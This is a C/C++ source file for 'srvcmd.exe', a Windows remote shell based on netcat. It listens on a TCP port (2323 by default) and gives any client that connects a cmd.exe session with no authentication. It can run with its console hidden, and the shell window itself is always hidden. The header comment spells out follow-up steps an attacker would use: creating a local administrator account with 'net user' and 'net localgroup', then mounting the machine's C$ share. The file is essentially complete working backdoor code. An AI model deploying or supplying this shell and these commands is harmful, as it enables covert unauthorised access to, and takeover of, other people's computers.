/*
 *  Remote Shell Development Code
 *  by: Jason_Jordan@omron.com
 *
 *  These notices must be retained in any copies of any part of this
 *  documentation and/or software.
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 1, or (at your option)
 *  any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. 
 *
 *	Description:
 *	This program is based off of netcat(thanks to Hobbit). This program
 *	allows multiple connections while netcat only allows one and is a bit
 *	easier to use.
 *	Run this program on any NT machine to open a remote shell on any port
 *  You can start the program hidden (/h) and also assign it what port to 
 *  listen on(default is 2323). Type "srvcmd.exe /?" for help.
 *	Once the program is listening telnet into the computer on that port and
 *	you have a shell(cmd) environment waiting for you. The shell will have 
 *	the same permissions as the user who started the program.
 *	If the shell is started with administrator access, you can do things like
 *	add users via the net command:
 *	net user jason password /add
 *	net localgroup "administrator" jason /add
 *	There is now a user account named jason, with password as the password
 *	with local administrator access on the remote machine. You can now mount 
 *	all administrative shares on your machine by running the following commands
 *	in a cmd window on your local machine:
 *	net use x: \\remote_computer\c$ password /USER:jason
 *	Of course, there are many other things this is useful for.
 */ 

#include <stdio.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int WSA_ERROR(char* x)  
{ 
	printf("Error %d: %s\n",WSAGetLastError(), x); 
	return 1; 
}

int serve(SOCKET listen);
void docmd(LPVOID sock);
static HANDLE StartShell(HANDLE StdinPipeHandle,HANDLE StdoutPipeHandle);
static VOID SessionReadShellThreadFn(LPVOID Parameter);
static VOID SessionWriteShellThreadFn(LPVOID Parameter);

int init(void)
{
    WSADATA data;
    WORD ver;
    int err;

    ver = MAKEWORD( 1, 1 );
    err = WSAStartup( ver, &data );
    if ( err != 0 ) 
	{
      printf("Error %d: Winsock Startup Failure\n", err);
      return 1;
    }
    return 0;
}

//chane to whatever number of connection you'd like to accept
#define MAX_SERVED 3

int serve(SOCKET listen)
{
    SOCKET accept;
    struct sockaddr_in client;
    int err, nSize;
    int numServed = 0;
    HANDLE handles[MAX_SERVED];
    DWORD myID;

    while (numServed < MAX_SERVED) 
	{

      nSize = sizeof(client);
      accept = ::accept(listen, (struct sockaddr *)&client, &nSize);
      if (accept == INVALID_SOCKET)
	  {
          WSA_ERROR("Error: accept failed\n");
	  }

      printf("Accepted connection from client at %s\n",inet_ntoa(client.sin_addr));
      
	  handles[numServed] = CreateThread(NULL, 1000,
										(LPTHREAD_START_ROUTINE)docmd,
										(LPVOID) accept, 0, &myID
										);
      
      numServed++;
    }

    err = WaitForMultipleObjects(MAX_SERVED, handles,
                                 TRUE, INFINITE);
    return 0;
}

#define BUFFER_SIZE 200

class SESSION_DATA
{
public:
    HANDLE  ReadPipeHandle;         // Handle to shell stdout pipe
    HANDLE  WritePipeHandle;        // Handle to shell stdin pipe
    HANDLE  ProcessHandle;          // Handle to shell process
    SOCKET  ClientSocket;
    HANDLE  ReadShellThreadHandle;  // Handle to session shell-read thread
    HANDLE  WriteShellThreadHandle; // Handle to session shell-read thread
};

static SESSION_DATA* CreateSession(void)
{
    SESSION_DATA* Session = new SESSION_DATA(); 
    SECURITY_ATTRIBUTES SA;
    HANDLE ShellStdinPipe = NULL;
    HANDLE ShellStdoutPipe = NULL;

    Session->ReadPipeHandle  = NULL;
    Session->WritePipeHandle = NULL;

	SA.nLength = sizeof(SA);
    SA.lpSecurityDescriptor = NULL; 
    SA.bInheritHandle = TRUE; 

    if(!CreatePipe(&Session->ReadPipeHandle, &ShellStdoutPipe,&SA, 0))
	{
		if(Session->ReadPipeHandle != NULL) CloseHandle(Session->ReadPipeHandle);
		if(ShellStdoutPipe != NULL)			CloseHandle(ShellStdoutPipe);
		delete Session;
		return NULL;
    }

    if(!CreatePipe(&ShellStdinPipe, &Session->WritePipeHandle,&SA, 0))
    {
		if(Session->ReadPipeHandle != NULL)		CloseHandle(Session->ReadPipeHandle);
		if(ShellStdoutPipe != NULL)				CloseHandle(ShellStdoutPipe);
		if(Session->WritePipeHandle != NULL)	CloseHandle(Session->WritePipeHandle);
		if(ShellStdinPipe != NULL)				CloseHandle(ShellStdinPipe);
		delete Session;
		return NULL;
    }
    
    Session->ProcessHandle = StartShell(ShellStdinPipe, ShellStdoutPipe);

    CloseHandle(ShellStdinPipe);
    CloseHandle(ShellStdoutPipe);

    return(Session);
}

void docmd(LPVOID sock)
{
	SOCKET client = (SOCKET)sock;
    SESSION_DATA* Session = CreateSession();
    SECURITY_ATTRIBUTES SecurityAttributes;
    DWORD ThreadId;
    HANDLE HandleArray[3];
	int i;

    SecurityAttributes.nLength = sizeof(SecurityAttributes);
    SecurityAttributes.lpSecurityDescriptor = NULL;
    SecurityAttributes.bInheritHandle = FALSE;

    Session->ClientSocket = client;

    Session->ReadShellThreadHandle = 
        CreateThread(&SecurityAttributes, 0,
                     (LPTHREAD_START_ROUTINE) SessionReadShellThreadFn, 
                     (LPVOID) Session, 0, &ThreadId);

    if (Session->ReadShellThreadHandle == NULL) 
	{
        Session->ClientSocket = INVALID_SOCKET;
        return;
    }

    Session->WriteShellThreadHandle = 
				CreateThread(&SecurityAttributes, 0, 
							(LPTHREAD_START_ROUTINE) SessionWriteShellThreadFn, 
							(LPVOID) Session, 0, &ThreadId);

    if (Session->WriteShellThreadHandle == NULL) 
	{
		Session->ClientSocket = INVALID_SOCKET;
        TerminateThread(Session->WriteShellThreadHandle, 0);
        return;
    }

    HandleArray[0] = Session->ReadShellThreadHandle;
    HandleArray[1] = Session->WriteShellThreadHandle;
    HandleArray[2] = Session->ProcessHandle;

	
    i = WaitForMultipleObjects(3, HandleArray, FALSE, 0xffffffff);
    
	
	switch (i) {
      case WAIT_OBJECT_0 + 0:
        TerminateThread(Session->WriteShellThreadHandle, 0);
        TerminateProcess(Session->ProcessHandle, 1);
        break;

      case WAIT_OBJECT_0 + 1:
        TerminateThread(Session->ReadShellThreadHandle, 0);
        TerminateProcess(Session->ProcessHandle, 1);
        break;
      case WAIT_OBJECT_0 + 2:
        TerminateThread(Session->WriteShellThreadHandle, 0);
        TerminateThread(Session->ReadShellThreadHandle, 0);
        break;
 
	  default:
        break;
    }


    closesocket(Session->ClientSocket);
	DisconnectNamedPipe(Session->ReadPipeHandle);
    CloseHandle(Session->ReadPipeHandle);
	DisconnectNamedPipe(Session->WritePipeHandle);
    CloseHandle(Session->WritePipeHandle);
    CloseHandle(Session->ReadShellThreadHandle);
    CloseHandle(Session->WriteShellThreadHandle);
    CloseHandle(Session->ProcessHandle);
 
    if(Session != NULL)	delete Session;
	
    return;
}

static HANDLE StartShell(HANDLE ShellStdinPipeHandle,
						 HANDLE ShellStdoutPipeHandle
						 )
{
    PROCESS_INFORMATION ProcessInformation;
    STARTUPINFO si;
    HANDLE ProcessHandle = NULL;

    si.cb = sizeof(STARTUPINFO);
    si.lpReserved = NULL;
    si.lpTitle = NULL;
    si.lpDesktop = NULL;
    si.dwX = si.dwY = si.dwXSize = si.dwYSize = 0L;
    si.wShowWindow = SW_HIDE;
    si.lpReserved2 = NULL;
    si.cbReserved2 = 0;

    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;

    si.hStdInput  = ShellStdinPipeHandle;
    si.hStdOutput = ShellStdoutPipeHandle;

    DuplicateHandle(GetCurrentProcess(), ShellStdoutPipeHandle, 
                    GetCurrentProcess(), &si.hStdError,
                    DUPLICATE_SAME_ACCESS, TRUE, 0);

    if (CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL,
                      &si, &ProcessInformation)) 
    {
        ProcessHandle = ProcessInformation.hProcess;
        CloseHandle(ProcessInformation.hThread);
    } 
    else printf("Failed to execute shell");

    return(ProcessHandle);
}

static VOID SessionReadShellThreadFn(LPVOID Parameter)
{
    SESSION_DATA* Session = (SESSION_DATA*)Parameter;
    BYTE    Buffer[BUFFER_SIZE];
    BYTE    Buffer2[BUFFER_SIZE+30];
    DWORD   BytesRead;

	// this bogus peek is here because win32 won't let me close the pipe if it is
	// in waiting for input on a read.
    while (PeekNamedPipe(Session->ReadPipeHandle, Buffer, sizeof(Buffer), 
                    &BytesRead, NULL, NULL)) 
    {
		DWORD BufferCnt, BytesToWrite;
        BYTE PrevChar = 0;

		if (BytesRead > 0)
		{
			ReadFile(Session->ReadPipeHandle, Buffer, sizeof(Buffer), 
                    &BytesRead, NULL);
		}
		else
		{
			Sleep(50);
			continue;
		}


        
        //
        // Process the data we got from the shell:  replace any naked LF's
        // with CR-LF pairs.
        //
        for (BufferCnt = 0, BytesToWrite = 0; BufferCnt < BytesRead; BufferCnt++) {
            if (Buffer[BufferCnt] == '\n' && PrevChar != '\r')
                Buffer2[BytesToWrite++] = '\r';
            PrevChar = Buffer2[BytesToWrite++] = Buffer[BufferCnt];
        }

        if (send(Session->ClientSocket, (char*)Buffer2, BytesToWrite, 0) <= 0) 
            break;
    }

    if (GetLastError() != ERROR_BROKEN_PIPE) {;}
        

	ExitThread(0);
}

static VOID SessionWriteShellThreadFn(LPVOID Parameter)
{
    SESSION_DATA* Session = (SESSION_DATA*)Parameter;
    BYTE    RecvBuffer[1];
    BYTE    Buffer[BUFFER_SIZE];
    BYTE    EchoBuffer[5];
    DWORD   BytesWritten;
    DWORD   BufferCnt, EchoCnt;
    DWORD   TossCnt = 0;
    BOOL    PrevWasFF = FALSE;

    BufferCnt = 0;

    while (recv(Session->ClientSocket, (char*)RecvBuffer, sizeof(RecvBuffer), 0) != 0) 
	{
        EchoCnt = 0;

        Buffer[BufferCnt++] = EchoBuffer[EchoCnt++] = RecvBuffer[0];
        if (RecvBuffer[0] == '\r')
		{
                Buffer[BufferCnt++] = EchoBuffer[EchoCnt++] = '\n';
		}


		// Trap exit as it causes problems
		if (strnicmp((char*)Buffer, "exit\r\n", 6) == 0)
			ExitThread(0);


        //
        // If we got a CR, it's time to send what we've buffered up down to the
        // shell process.
        //
        if (RecvBuffer[0] == '\n' || RecvBuffer[0] == '\r') 
		{
            if (! WriteFile(Session->WritePipeHandle, Buffer, BufferCnt, 
                            &BytesWritten, NULL))
            {
                break;
            }
            BufferCnt = 0;
        }
    }
	ExitThread(0);
}


main(int argc, char **argv)
{
	SOCKET listen;
    int err;
    int port = 2323;
    struct sockaddr_in srv;
	
	//check args
	if(argc >= 2)
	{
		if(strcmp(argv[1],"/?") == 0)
		{
			printf("Usage: srvcmd.exe [/h] [port]\n"
				   "/?   - Show this\n"
				   "/h   - Hide Window\n"
				   "port - Port to listen on, defaults to 2323\n"
				   );
			return 0;
		}
		
		//hide window
		if(strcmp(argv[1],"/h") == 0) FreeConsole();
		else port = atoi(argv[1]); //must be a port number
	}

	if(argc >= 3)
	{
		port = atoi(argv[2]);
	}
	
    init();
    listen = socket(PF_INET, SOCK_STREAM, 0);
    
	if (listen == INVALID_SOCKET) 
	{
        WSA_ERROR("Error Opening Socket");
        return 1;
    }


    srv.sin_family = PF_INET;
    srv.sin_addr.s_addr = htonl(INADDR_ANY);
    srv.sin_port = htons(port);

    err = bind(listen, (const struct sockaddr *) &srv,sizeof(srv));
    
	if (err == INVALID_SOCKET)
	{
        WSA_ERROR("Error binding to Socket\n");
		closesocket(listen);
		return 1;
	}

    err = ::listen(listen, SOMAXCONN);
    if (err == INVALID_SOCKET)
	{
        WSA_ERROR("listening failure\n");
		closesocket(listen);
		return 1;
	}

    serve(listen);
    WSACleanup();
    return 0;
}



